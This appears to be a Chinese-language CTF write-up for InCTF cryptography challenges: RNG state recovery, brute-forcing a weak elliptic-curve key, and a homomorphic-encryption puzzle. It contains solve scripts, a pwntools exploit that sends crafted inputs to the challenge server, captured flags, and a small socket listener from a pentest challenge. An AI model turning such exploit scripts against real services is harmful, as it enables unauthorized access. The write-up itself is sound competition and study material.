enc = {'cip': '71d39d37d3c03e08b82d81ae3b4be658e2dbdaee6a73d73a3e88271f423db30f0422d4fb9475ceef281a746afa86eaee', 'iv': 'cbf411655acfd7f670968ccf44d74e05', 'leak': '3aeba43302ab9ad0df898103fc0223be23f5ec10f62ad48744c2ec06bc4ac9b2290aff5f5d17fc2ff2a1115e657ddced0f12238ca12b076bf85fed0ce621202d159c014907e39ba7373ada78a4dea3a76bfb9ff09a8f10705cd95a47edd743fde25f32ab545bf98bba1344bed511b0c095ddede11b4a35bc02acb34d3aef46c56bfc9b668c82c0d3da76307dd87016e1a7df478cdefb98d4fe991088f478f24390fac3d4f0d0673d2801f37df421ab17cb72af64a8b21ebf9d73c3ef35a8bd5fe98c62a910ef8b859b86a58bf670fe544266bc37a36d3828e7397bac0b817f41522e76a68661b3e9952ed3d2eb7846b2f9cd2c1cc44eda2ac536eb826ce922afaa4c7d61ff3db9023cf2fff8fb34791954fbb1541f043fe26e92fb79f119fbe175bd1b551dd1225275a457580bef4301505f474060f39caad6d3172f17a9a21f68e66b59a13e817b0201dbdbcc1e6c1d80ab2e8d38f7f0a62d0bb3577da845643273b1743f5aac064422bdbd85358f6da726f9114c5553432d4f4e2f43f997975add7ea3b6a56b689ff84f7635815879e28d8c7421b979449f5bccb29cce745862610af8c99379c60e1205d5e1eda9d2f5243d4da4325ac142bd196d1777bd2d4f61eb355b7fca3e16295d05e8a21e75f010272ce159afb49fa3d4b97bd242304e34599f7bc8edf5b4430bb42b12437b7c27583d303043311afd56fae70a7d6b'}
# Pipeline: leaked outputs -> state after the refresh -> state before the
# refresh -> the 64 outputs produced from that earlier state, whose SHA-256
# (first 16 bytes) is used as the AES key.
leak = enc['leak']
aa = from_leak_get_aa(leak)
seed = from_aa_get_seed(aa)
seed_prev = inv_wrap(seed)
out1 = ''.join(format(next(seed_prev, i), '016x') for i in range(64))
key = hashlib.sha256(bytes.fromhex(out1)).digest()[:16]

cip = bytes.fromhex(enc['cip'])
iv = bytes.fromhex(enc['iv'])
aes = AES.new(key, AES.MODE_CBC, iv)
# The padding is not removed, so the printed plaintext keeps its pad bytes.
flag = aes.decrypt(cip)
print(flag)
# b'inctf{S1mpl3_RN65_r_7h3_b35t!_b35e496b4d570c16}\x01'
Eazy Xchange
给gen_key稍微变换一下
def gen_key(G, pvkey):
    """Return the sum of ``k * G`` over every element ``k`` of ``pvkey``.

    NOTE(review): the elements are only ever added together, so the result
    equals ``sum(pvkey) * G``. With byte-sized elements the effective secret
    is a small integer rather than the full key length.
    """
    total = 0
    for scalar in pvkey:
        total = total + scalar * G
    return total
def gen_key(G, pvkey):
    """Return ``G`` multiplied by the sum of the elements of ``pvkey``.

    This is the author's equivalent rewrite of the challenge function; it
    makes visible that only the sum of the key bytes matters.
    """
    return G * sum(pvkey)
这里tmp很小
def gen_bob_key(EC, G):
    """Draw a 4-byte private key and return ``(public_point, private_key)``.

    ``EC`` is accepted but not used. Because ``gen_key`` depends only on the
    sum of the key bytes, the four random bytes contribute a scalar of at
    most 4 * 255 = 1020.
    """
    secret = os.urandom(4)
    return gen_key(G, secret), secret
由gen_bob_key可知
稍微爆破一下得到flag
import os, hashlib, pickle
from tqdm import tqdm
# -----------------------------------
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
# Curve y^2 = x^3 + a*x + b over GF(p). These values match the NIST P-256
# (secp256r1) parameters, so the curve itself is a standard one.
p = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
a = p - 3
b = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
EC = EllipticCurve(GF(p), [a, b])
G = EC.gens()[0] # fixed point; replaced further down by the point taken from the data
def decrypt(cip, key, iv):
    """AES-CBC decrypt ``cip`` with a key derived from ``key``.

    The AES key is the first 16 bytes of SHA-256 over the decimal string of
    ``key``. Padding is left in place.
    """
    digest = hashlib.sha256(str(key).encode()).digest()
    return AES.new(digest[:16], AES.MODE_CBC, iv).decrypt(cip)
data = {'cip': '9dcc2c462c7cd13d7e37898620c6cdf12c4d7b2f36673f55c0642e1e2128793676d985970f0b5024721afaaf02f2f045', 'iv': 'cbd6c57eac650a687a7c938d90e382aa', 'G': '(38764697308493389993546589472262590866107682806682771450105924429005322578970 : 112597290425349970187225006888153254041358622497584092630146848080355182942680 : 1)'}
FLAG = bytes.fromhex(data['cip'])
iv = bytes.fromhex(data['iv'])

# Coordinates of the point published in data['G'].
x = 38764697308493389993546589472262590866107682806682771450105924429005322578970
y = 112597290425349970187225006888153254041358622497584092630146848080355182942680
G = EC(x, y)
print(G)

# Walk through the multiples 2*G, 3*G, ... and try each x-coordinate as the
# key material until the plaintext carries the flag prefix.
# NOTE(review): the walk starts at 2*G, so the point G itself is never tried.
SS = G
for i in tqdm(range(2, 1024 * 1024)):
    SS = SS + G
    msg = decrypt(FLAG, SS.xy()[0], iv)
    if b'inctf' not in msg:
        continue
    print(msg)
    break
# inctf{w0w_DH_15_5o_c00l!_3c9cdad74c27d1fc}
Encrypted Operations
这个太哈人了 全是cpp
审了一天
发现印度老哥这个vector的理解和我不一样,缝缝补补终于搞出来了
反正这个题应该很难有复现环境了
(其实能把homomorphic_system复写一遍应该还是可以的?放在docker里面还是比较好部署的)
就干脆简单说一下三个部分的思路好了🐫
part1
// Excerpt from the challenge source (the enclosing function is not shown).
// Fill the 20x20 grid with consecutive values; val's starting value is
// outside this excerpt.
for (int x = 0; x < 20; x++)
{
    for (int y = 0; y < 20; y++)
    {
        m[x][y] = ++val;
    }
}
// d, r and c are declared here but not used within this excerpt.
int d = 20;
int r = 3;
int c = 3;
// Flatten every 3x3 window of the grid (18x18 window positions) into mat,
// nine values per window.
for (int i = 0; i < 18; i++)
{
    for (int j = 0; j < 18; j++)
    {
        for (int p = 0; p < 3; p++)
        {
            for (int q = 0; q < 3; q++)
            {
                mat.push_back(m[i + p][j + q]);
            }
        }
    }
}
for (int j = 0; j < int(mat.size()); j += 9)
{
    v.push_back(slice(mat, j, j + 9)); // cut mat back into 9-element windows
}
idx = Genrand(0, v.size() - 1);
vector<int64_t> temp1(begin(v[idx]), end(v[idx]));
vector<int64_t> mvector = temp1;
// Pick one window at random and sum it.
// NOTE(review): the initial value 0 is an int, so accumulate adds in int,
// not int64_t; harmless for values this small.
sum1 = accumulate(mvector.begin(), mvector.end(), 0);
FheEncrypt(mvector);
EncryptedOperations();
vector<int64_t> p = FheDecrypt();
if (sum1 == 0)
{
    cout << "\n\nCHALLENGE CORRUPTED!!!!";
    exit(0);
}
// The level passes only when slot 0 of the decrypted vector equals the
// plaintext sum computed above.
if (p[0] == sum1)
    cout << "\n\nYou got all the encrypted operations right! Great!!\n\nNow on to the next\n\n";
else
    exit(0);
拿到外面跑一下发现其实就是对切片求和,由于temp1里面本质上是个等差数列,找一下规律就可以了
part2同理
payload1
9 0 0 0
*
1
y
189 0 0 0
+
1
n
189 0 0 0
+
1
n
+
20 0 0 0
*
1
y
830 0 0 0
+
1
n
level2 对 p1 p2 取反使其抵消掉numVec里面除了m1[row[2]]以外的所有向量
在 userinp生成处,往后多选了一位,这个操作可以在EncryptedOperations中对m1[row[2]]右移一位抵消掉影响,最后一位并不会消失,而是会将vector的长度扩展一位
p = vector<int64_t>(p.begin(), p.begin() + 5 + 1);
exp
from pwn import *
from pwnlib.util.iters import random_permutation
# crypto.challenge.bi0s.in 1221
data = """9 0 0 0
*
1
y
189 0 0 0
+
1
n
189 0 0 0
+
1
n
+
20 0 0 0
*
1
y
830 0 0 0
+
1
n
0 0 0 0 0
>
1
n
-1 -1 -1 -1 -1
*
1
n
-1 -1 -1 -1 -1
*
1
n
"""
# Send the whole prepared answer sheet in one go, skip past the first two
# occurrences of "flag" in the reply, then print what follows if it carries
# the flag prefix.
io = remote('crypto.challenge.bi0s.in', 1221)
io.sendline(data)
for _ in range(2):
    io.recvuntil('flag')
buf = io.recv(2048)
if b'inctf' in buf:
    print(buf)
    exit(0)
# inctfi{m4st3r_0f_Encrypt3d_0p3r4t1on5_B3c0m3_u_H4v3!!}
shell
❯❯ inctf 22:18 python3 -u "c:\Users\16953\Desktop\inctf\Encrypted Operations\src\exp.py"
[x] Opening connection to crypto.challenge.bi0s.in on port 1221
[x] Opening connection to crypto.challenge.bi0s.in on port 1221: Trying 34.106.211.122
[+] Opening connection to crypto.challenge.bi0s.in on port 1221: Done
b': inctfi{m4st3r_0f_Encrypt3d_0p3r4t1on5_B3c0m3_u_H4v3!!}\n\n\nThankyou for using the srvice! Sucessfully performed all operatoions!!\n\n\nExiting!!'
[*] Closed connection to crypto.challenge.bi0s.in port 1221
Challenge-attachment
network-pentest
Listen
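def listen():
    """Accept one TCP connection on 172.30.0.14:31337 and print what arrives.

    Four reads of up to 2048 bytes are printed in order. Both sockets are
    now closed when the function returns (the original left them open), and
    bytes that are not valid UTF-8 are replaced instead of raising, since
    the peer's data is not under the listener's control.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as skt:
        skt.bind(('172.30.0.14', 31337))
        skt.listen(1)
        handle, addr = skt.accept()
        with handle:
            for _ in range(4):
                print(handle.recv(2048).decode(errors="replace"))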
listen()